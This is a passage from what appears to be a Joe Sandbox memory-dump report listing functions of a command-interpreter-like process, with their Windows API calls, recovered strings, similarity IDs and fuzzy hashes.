                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06D6
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06F0
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB074D
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB0762
                                      • _wcsicmp.MSVCRT ref: 00007FF755CAB518
                                      • _wcsicmp.MSVCRT ref: 00007FF755CAB58B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$_wcsicmp$AllocProcess
                                      • String ID: ELSE$IF/?
                                      • API String ID: 3223794493-1134991328
                                      • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                      • Instruction ID: 370459b13d7883b14f47487c5112f17cb39905d57d06dd420c6714ab9c516ce5
                                      • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                      • Instruction Fuzzy Hash: 22413CBBE0964381FB55BB64E4652B9AA91AF84F4CFCC9839D54E47291DF3CE8018370
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                      • String ID:
                                      • API String ID: 1532185241-0
                                      • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                      • Instruction ID: 482becd2401ff8b49f4dd9e92ff29ae8fe4a5d1c4f13d709e3115329c8dbf995
                                      • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                      • Instruction Fuzzy Hash: 844103BBA0478387E751AB20D44557DFBA1FB8AF84F885535EA1A43B81CF3CE8018B10
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                      • String ID:
                                      • API String ID: 3588551418-0
                                      • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                      • Instruction ID: 0a6e0337adc5e8c5599b25f8a25eba21ddee29ddecfb03f08c13dc4f1eb9a844
                                      • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                      • Instruction Fuzzy Hash: EC41B0BBA086438BE714AB51E44027DFA61EF85F88F9C9439D64E47791CE7CE840C760
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorModememset$FullNamePath_wcsicmp
                                      • String ID:
                                      • API String ID: 2123716050-0
                                      • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                      • Instruction ID: 04b3b597061562ad7b4ab6146dd41a22fd8cedd502d51611de6a3727b0be1edf
                                      • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                      • Instruction Fuzzy Hash: F3419377705BC68AEB72AF21D8503E9A794EB49B4CF884134DA4D4AA98DF3CD6448710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                      • String ID:
                                      • API String ID: 3114114779-0
                                      • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                      • Instruction ID: 2773c181e66617920dfc2d386a48490eeb5d9210236cc699a9e4743cbec318d3
                                      • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                      • Instruction Fuzzy Hash: A141277BA09A428AE700AF65D4402ACBBB5FB88B48F994035DA0D93B54DF38D446C760
                                      APIs
                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA77A
                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA7AF
                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA80E
                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA839
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF755CC9A82), ref: 00007FF755CCA850
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseErrorLastOpen
                                      • String ID:
                                      • API String ID: 2240656346-0
                                      • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                      • Instruction ID: 83201213402254ec95efb91a2731233e58637748bfb1e2916b3d7ab42a5d0297
                                      • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                      • Instruction Fuzzy Hash: 4931A07BA28A8287E750AF24E844479F7A5FB88F94F985030EA5E42B54DF3CD841CB10
                                      APIs
                                        • Part of subcall function 00007FF755CB01B8: _get_osfhandle.MSVCRT ref: 00007FF755CB01C4
                                        • Part of subcall function 00007FF755CB01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB01D6
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CCD0F9
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF755CCD10F
                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF755CCD166
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CCD17A
                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF755CCD18C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                      • String ID:
                                      • API String ID: 3008996577-0
                                      • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                      • Instruction ID: 64dcaa90d0b989fc5be6b187dcbf2f037dbae7e42dd90babaeb74a9f3b209084
                                      • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                      • Instruction Fuzzy Hash: 1B213C6AB14692CAE740AB71E8400BDB7B0FB4DF59B885125DE1D93B58EF38D041CB24
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CreateSemaphore
                                      • String ID: _p0$wil
                                      • API String ID: 1078844751-1814513734
                                      • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                      • Instruction ID: b799e36d2a2b53f4db845658fbff8eb59fb9a8db45d3c61547d7cc2acf43825d
                                      • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                      • Instruction Fuzzy Hash: 5D51E3EBB1968386EE61EF1484582B9E2A0EF84F98FDC5435DA1D4B780DE3CE4058760
                                      APIs
                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF755CCB934
                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF755CB5085), ref: 00007FF755CCB9A5
                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF755CB5085), ref: 00007FF755CCB9F7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                      • String ID: %WINDOWS_COPYRIGHT%
                                      • API String ID: 1103618819-1745581171
                                      • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                      • Instruction ID: 2dfc90948bbbb489d294afe3ee1919b29830ee19f295482ea2a748cc03bdd18f
                                      • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                      • Instruction Fuzzy Hash: 5B41A2BBA08B8382EA50AF559410279B3B0FB49F98FC95231DA9D47395EF3CE481C750
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$_wcslwr
                                      • String ID: [%s]
                                      • API String ID: 886762496-302437576
                                      • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                      • Instruction ID: e03b3456d91fb5cc6b021c94fbad4ae260e06f015dff1aae44c15bb7276830eb
                                      • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                      • Instruction Fuzzy Hash: FE315976705BC285EB61EB25D8503E9A7A0FB88B88F884135DA8D8B755EF3CE6458310
                                      APIs
                                        • Part of subcall function 00007FF755CB33A8: iswspace.MSVCRT(?,?,00000000,00007FF755CCD6EE,?,?,?,00007FF755CC0632), ref: 00007FF755CB33C0
                                      • iswspace.MSVCRT(?,?,?,00007FF755CB32A4), ref: 00007FF755CB331C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswspace
                                      • String ID: off
                                      • API String ID: 2389812497-733764931
                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                      • Instruction ID: 003e8df3e1e5a76f5f506b14747cec06093b6e38b585308ec7815883466b07b5
                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                      • Instruction Fuzzy Hash: 782160ABE0C65381FB607B1A945427AE690EF45FA8FDCA234D94E47681DE2DEC418321
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                      • String ID: %s=%s$DPATH$PATH
                                      • API String ID: 3731854180-3148396303
                                      • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                      • Instruction ID: c4fdd765b2e1f040bf6f1a3fe2525fb2297020acdc9872d76b99c0a780861842
                                      • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                      • Instruction Fuzzy Hash: AE2192ABB0968780EE94AB55E440279A760AF84F88FCC6135C95E8B795DF6CE440C360
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcscmp
                                      • String ID: *.*$????????.???
                                      • API String ID: 3392835482-3870530610
                                      • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                      • Instruction ID: 4091dfc48e07deb4e09d0d26c8257658d8336a2e81ec6eddfd813a38c019bfe7
                                      • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                      • Instruction Fuzzy Hash: 171182AAB14AA381EB64EF26A840539B2A1EB44F94FDC5031DE8D47B45DE7DE8418710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: fprintf
                                      • String ID: CMD Internal Error %s$%s$Null environment
                                      • API String ID: 383729395-2781220306
                                      • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                      • Instruction ID: 8225d12b675947383725073c8228f5827448db5b0f9f5d4f4b49e00c401916b8
                                      • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                      • Instruction Fuzzy Hash: 601191AB90868391EA55AB14E9410B9A261EB44FF8FC96331D67D472D4EF2CF481C350
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswspacewcschr
                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                      • API String ID: 287713880-1183017076
                                      • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                      • Instruction ID: de6d9d6c4937d021cb9490cb91b12b1917679e74c13a4f9605baae08714b5cd2
                                      • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                      • Instruction Fuzzy Hash: 5AF044E7A1A69391EA609B01A440176F690FF44F98BCD9535D95D52254EF2CFC40C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                      • API String ID: 1646373207-2530943252
                                      • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                      • Instruction ID: f53ee8544d132469c1f43afcd01084ac052a95d2dfce0dcac0aabf1fb1acc1ac
                                      • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                      • Instruction Fuzzy Hash: C301E1EBE09E47D1EA84A711A891178A2A0EF45F38FCC4735C53E527E0DE7C79859324
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: RaiseFailFastException$kernelbase.dll
                                      • API String ID: 1646373207-919018592
                                      • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                      • Instruction ID: e526e3d708a25b3387472599021001b698bf52af2f93beefdc962250e9aea62c
                                      • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                      • Instruction Fuzzy Hash: 81F030A6618B82D2EA80AB12F544079EA60FF89FD4B889134D94D43B14CF3CD445C710
                                      APIs
                                      Memory Dump Source
